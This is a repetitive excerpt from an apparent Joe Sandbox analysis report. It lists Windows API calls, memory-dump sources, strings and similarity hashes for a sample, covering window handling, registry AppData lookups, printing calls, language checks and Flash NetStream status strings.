                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                        • API String ID: 2978645861-761530088
                                                                                                                                                        • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                        • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                        • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                        • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                                        • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                        • API String ID: 3375834691-1928458085
                                                                                                                                                        • Opcode ID: 8e8d82514e9d8b960081925372c41b61d7cb84f965052bb5de2fbd8ea45d4c2e
                                                                                                                                                        • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                        • Opcode Fuzzy Hash: 8e8d82514e9d8b960081925372c41b61d7cb84f965052bb5de2fbd8ea45d4c2e
                                                                                                                                                        • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                        • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3087884050-0
                                                                                                                                                        • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                        • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                        • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                        • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004CFE8F
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D80B,?), ref: 004CFEC1
                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004CFF52
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D80B,?), ref: 004CFF84
                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004CFFF3
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D80B,?), ref: 004D0021
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004D0043
                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                        • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                        • API String ID: 3944000476-502054578
                                                                                                                                                        • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                        • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                        • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                        • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                        • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                        • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                        • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                        APIs
                                                                                                                                                        • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                        • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDevice$Start
                                                                                                                                                        • String ID: portrait
                                                                                                                                                        • API String ID: 1738886688-2504013051
                                                                                                                                                        • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                        • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                        • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                        • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                        • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4022644143-0
                                                                                                                                                        • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                        • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                        • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                        • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,004712C5,/go/settmgr_locsecy_,?), ref: 004CBBB7
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 004CBBC9
                                                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 004CBBD7
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004CBBE4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressDefaultFreeLangLoadProcSystem
                                                                                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll$zh-CN$zh-TW
                                                                                                                                                        • API String ID: 4093128580-2467112630
                                                                                                                                                        • Opcode ID: 3d939128caeb4f4a0c2a3e1391e0404935b02da9d145a63f7b898458335e617f
                                                                                                                                                        • Instruction ID: 32edacdcee4e875539d91fbc6b6cd0e564fa17a214d6f4638376f3859b545aac
                                                                                                                                                        • Opcode Fuzzy Hash: 3d939128caeb4f4a0c2a3e1391e0404935b02da9d145a63f7b898458335e617f
                                                                                                                                                        • Instruction Fuzzy Hash: 3821A236B1401813E7B4912E7929BBB49CAE7D4364F4E407AE40DDB358EE199C8B62D4
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                        • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                        • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                        • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                        • API String ID: 2943255653-4242577526
                                                                                                                                                        • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                        • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                        • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                        • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                        • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                        • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                        • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                        • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                        • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                        • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
